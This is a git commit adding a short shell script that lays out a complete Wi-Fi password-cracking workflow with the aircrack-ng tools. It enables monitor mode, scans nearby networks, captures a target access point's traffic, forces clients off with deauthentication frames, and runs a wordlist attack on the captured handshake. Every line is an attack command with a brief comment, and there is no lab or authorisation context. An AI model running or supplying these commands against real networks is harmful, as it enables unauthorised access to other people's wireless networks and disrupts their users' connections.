shell script
This commit is contained in:
@@ -0,0 +1,7 @@
|
||||
airmon-ng #Looking for device
|
||||
airmon-ng start wlan0 #Start Listen Mode
|
||||
airodump-ng wlan0mon #Scan surroudings wifi
|
||||
airodump-ng -c ID --bssid address -w /file/name wlan0mon #Begin to capture packet
|
||||
aireplay-ng -0 2 -a router -c client wlan0mon #Begin to De-authentication
|
||||
aircrack-ng -w passwd name #Begin to attack packet
|
||||
airmon-ng stop wlan0mon #Close Listen Mode
|
||||
Reference in New Issue
Block a user